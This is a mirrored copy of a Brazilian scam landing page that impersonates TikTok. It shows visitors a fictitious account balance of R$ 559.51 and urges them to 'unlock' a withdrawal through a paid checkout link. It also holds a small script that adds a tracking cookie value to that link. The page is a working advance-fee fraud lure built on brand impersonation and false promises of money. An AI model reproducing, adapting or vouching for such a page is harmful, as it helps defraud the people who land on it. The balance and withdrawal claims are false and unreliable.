<!DOCTYPE html><html lang="pt-BR">
<!-- Mirrored from avalienahora.shop/validarpix/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 11 May 2025 18:19:04 GMT -->
<head>
    
   <link href="cdn/shopifycloud/boomerang/shopify-boomerang-1.0.0.min.html" rel="preload" as="script">
  

    
    <!-- Google tag (gtag.js) -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-FZL0P8LE6G"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-FZL0P8LE6G');
</script>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="">
    <title>TikTok</title>
    <link rel="icon" href="images/Logo%20TTK.png" type="image/x-icon">
    
    <script>
// Função para obter o valor de um cookie específico
function getCookie(name) {
    const value = "; " + document.cookie;
    const parts = value.split("; " + name + "=");
    if (parts.length === 2) return parts.pop().split(";").shift();
}

// Função para atualizar o link do botão de checkout
document.addEventListener("DOMContentLoaded", function() {
    // Obtém o valor do cookie 'src'
    const srcCookie = getCookie('src');

    // Seleciona o botão de checkout
    const checkoutLink = document.querySelector(".centralizar a");

    if (checkoutLink && srcCookie) {
        // Adiciona o parâmetro 'src' ao link
        checkoutLink.href += (checkoutLink.href.includes('?') ? '&' : '?') + "src=" + srcCookie;
    }
});
</script>


    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Montserrat', sans-serif;
            background-color: #FFFFFF;
            color: #333;
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        /* Cabeçalho */
        .header {
            width: 100%;
            background-color: #ff0150;
            color: white;
            font-weight: bold;
            text-align: center;
            padding: 10px;
            font-size: 16px;
        }

        /* Container Principal */
        #p1 {
            width: 100%;
            max-width: 400px;
            background-color: #FFFFFF;
            padding: 15px;
            border-bottom: 1px solid #202020;
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin-bottom: 20px;
        }

        #logo {
            width: 130px; /* Aumenta o tamanho do logotipo */
            margin-left: 5p;
        }

        .boxSaldo {
            display: flex;
            flex-direction: column;
            align-items: flex-end;
            border: 2px solid #ff0150;
            border-radius: 6px;
            padding: 5px 10px;
            margin-right: 5px;
        }

        .textoSaldo {
            font-size: 10px;
            font-weight: bold;
            background: #fff;
            padding: 2px 14px;
            color: #333;
        }

        .valorSaldo {
            font-size: 14px;
            font-weight: 700;
            color: #333;
        }

        /* Conteúdo do Vídeo */
        #produto1 {
            width: 100%;
            max-width: 400px;
            text-align: center;
            padding: 15px;
        }

        #produto1 h4 {
            color: #ff0150;
            font-size: 18px;
            margin-bottom: 10px;
        }

        #video-container {
            width: 100%;
            max-width: 360px;
            margin: 0 auto;
            overflow: hidden;
            border: 2px solid #ff0150;
            border-radius: 8px;
            margin-bottom: 20px;
            position: relative;
            
        }

        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border: none;
        }

        /* Botão */
        .centralizar {
            width: 100%;
            display: flex;
            justify-content: center;
        }

        button {
            background-color: #ff0150;
            color: white;
            border: none;
            border-radius: 5px;
            width: 85%;
            max-width: 300px;
            height: 50px;
            font-weight: bold;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        button:hover {
            background-color: #ff0150;
        }

        /* Responsividade */
        @media (max-width: 480px) {
            #p1 {
                flex-direction: row;
                justify-content: space-between;
            }
        }
    </style>
</head>

<body>
    <div class="header">
        ASSISTA O VÍDEO ABAIXO PARA LIBERAR SEU SAQUE E ACESSO VITALÍCIO.
    </div>

    <div id="p1">
        <img id="logo" src="images/tiktoklogo.svg" alt="Spotify Logo">
        <div class="boxSaldo">
            <span class="textoSaldo">SALDO</span>
            <span class="valorSaldo">R$ <span class="saldoAtualizado">559.51</span></span>
        </div>
    </div>

    <div id="produto1">
        <h4>DESBLOQUEIO DE SALDO</h4>
        <p>Veja como liberar seu saque</p><p>assistindo ao vídeo.</p>

        <div id="video-container">
            <video src="media/vsl%20tiktok.mp4" controls="" width="350" autoplay="" poster="images/capattk.html"></video>
        </div>

        <div class="centralizar">
            <a href="https://pay.pagamentosprotegidos.com/checkout/be8d68d2-45de-4393-b147-714e4bccd1da" style="width: 100%; text-decoration: none;">
                <button><span>DESBLOQUEAR AGORA</span></button>
            </a>
        </div>
    </div>


</body>
<!-- Mirrored from avalienahora.shop/validarpix/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 11 May 2025 18:19:05 GMT -->
</html>